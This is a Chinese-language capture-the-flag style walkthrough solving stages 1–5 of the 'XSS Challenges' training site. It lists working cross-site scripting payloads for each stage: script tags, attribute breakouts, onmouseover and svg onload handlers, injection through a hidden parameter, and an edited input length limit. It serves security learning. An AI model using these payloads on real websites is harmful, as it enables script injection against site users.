XSS训练网站XSS Challenges所有题目解(上篇)

XSS网站:网站(点我进入)

中篇链接:我是中篇
下篇链接:我是下篇------待完成

目录

      • Stage #1 简单XSS
      • Stage #2 属性中的XSS
        • 解法一
        • 解法二
      • Stage #3 列表中的XSS
      • Stage #4 隐藏参数中的XSS
        • 解法一
        • 解法二
      • Stage #5 限制输入长度的XSS

PS:Hint有提示,选中就会显示

Stage #1 简单XSS

很简单,输入下列代码进去解决问题

<script>alert(document.domain);</script>

Stage #2 属性中的XSS

提示:close the current tag and add SCRIPT tag…
使用属性来进行XSS
F12查看源码,发现有value
XSS训练网站XSS Challenges所有题目解(上篇)_第1张图片

这就考查到我们怎么去闭合value

解法一

"><script>alert(document.domain);</script>

解法二

使用onmouseover事件

" onmouseover=alert(document.domain);>

Stage #3 列表中的XSS

查看源码,发现文本框中构成不了XSS,代码被转义了
XSS训练网站XSS Challenges所有题目解(上篇)_第2张图片
所以考虑列表中的XSS

使用burpsuite抓包后
在这里插入图片描述
使用如下代码

"><script>alert(document.domain);</script>

形成如下payload即可

p1=123&p2="><script>alert(document.domain);</script>

Stage #4 隐藏参数中的XSS

老样子F12查看源码
发现输入框仍然被转义
使用burpsuite抓包后发现如下情况XSS训练网站XSS Challenges所有题目解(上篇)_第3张图片
先在列表中使用XSS,发现列表中的XSS被转义了
XSS训练网站XSS Challenges所有题目解(上篇)_第4张图片

解法一

F12然后使用ctrl+f搜索抓包出现的参数hackme
阅读代码后
发现能进行XSS,那就老样子
使用burpsuite抓包把下列代码添加到hackme参数里即可

"><script>alert(document.domain);</script>

解法二

使用svg添加到hackme参数即可

"><svg onload=alert(document.domain);>%0a

Stage #5 限制输入长度的XSS

文本框输入后发现限制了长度
F12查看源码,发现maxlength=“15”
直接把15改为100,然后输入一下代码即可(三种都行)

"><svg onload=alert(document.domain);>%0a
或
"><script>alert(document.domain);</script>" οnmοuseοver="alert(document.domain)">

你可能感兴趣的:(XSS,XSSchallenges)